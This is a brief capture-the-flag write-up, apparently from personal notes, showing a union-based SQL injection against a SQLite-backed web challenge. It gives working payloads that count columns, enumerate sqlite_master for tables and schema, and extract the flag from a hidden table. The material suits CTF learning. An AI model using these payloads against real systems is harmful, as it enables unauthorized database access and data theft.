![0bd963e0fab023ef6bb3bea67eadffb1.png](1898eb258da44020aa863cdea27ac4d9.png)
![a4b435766bae96b5758d0f72fa66e951.png](24f9cbc23aa543d3b209037b95fec9e4.png)
This felt sql-y to me immediately. Can we break it?
![2cb3cd7007280a5bb1d8e7d384199e50.png](03293b0cc3574e8b998ce620e487454c.png)
Sure can
Let's try some unions and see if we can pull some info. Trial and error, I found that there are 3 columns
```
' union select 1,2,3-- -
```
![f05c577c85d1a5666c3dd18972d9377a.png](73ae87e2e2c9491cafcafde5b1bd0390.png)
Pulling the table names
```
' union select 1,2,tbl_name FROM sqlite_master;-- -
```
![4a84f8151e0ddef877149468c5024de7.png](eb9ef731fa514464a9a7d274c74b1ede.png)
And enumerating the columns
```
' union select 1,2,sql FROM sqlite_master;-- -
```
![a8c10e5b97f2052140ff548cb2366cf5.png](1b3c7ed17882412596a6139d6bd6cc12.png)
Now to grab the data we want
```
' union select 1,flag,link FROM hidden;-- -'
```
![f371f6f2b411eff475d26a63f03a09fa.png](64f9f66a77b644a2a52e31394650c7d5.png)
![d3bfbfa84de6efdf5c82205d501e3b1f.png](591ef90465d944d5abdbd9328ca4fdfc.png)
And the flag
![d42ac7adad61696cb81ac2de4cc58f29.png](baf313f12172468fb7b7f183edd32ef1.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #sqlinjection
Related: